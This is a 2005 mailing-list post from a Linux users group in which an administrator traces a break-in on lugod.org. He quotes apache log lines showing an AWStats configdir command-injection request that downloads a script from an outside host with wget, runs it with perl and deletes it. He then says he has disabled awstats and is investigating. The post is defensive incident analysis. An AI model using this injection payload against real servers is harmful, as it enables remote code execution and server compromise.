January 6: Social gathering
2005 Feb 16 04:22

Re: [vox-tech] lugod.org cracked?

I think I found the point of entry.  From the lugod.org
apache log:

65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

It seems that more than 11 bugs were fixed in awstats in the
past 3 weeks, and or course I have not been updating that
frequently.  For now I have disabled awstats, have restarted
the web server, and am keeping a close eye on it while I do
more investigation.

-- Rod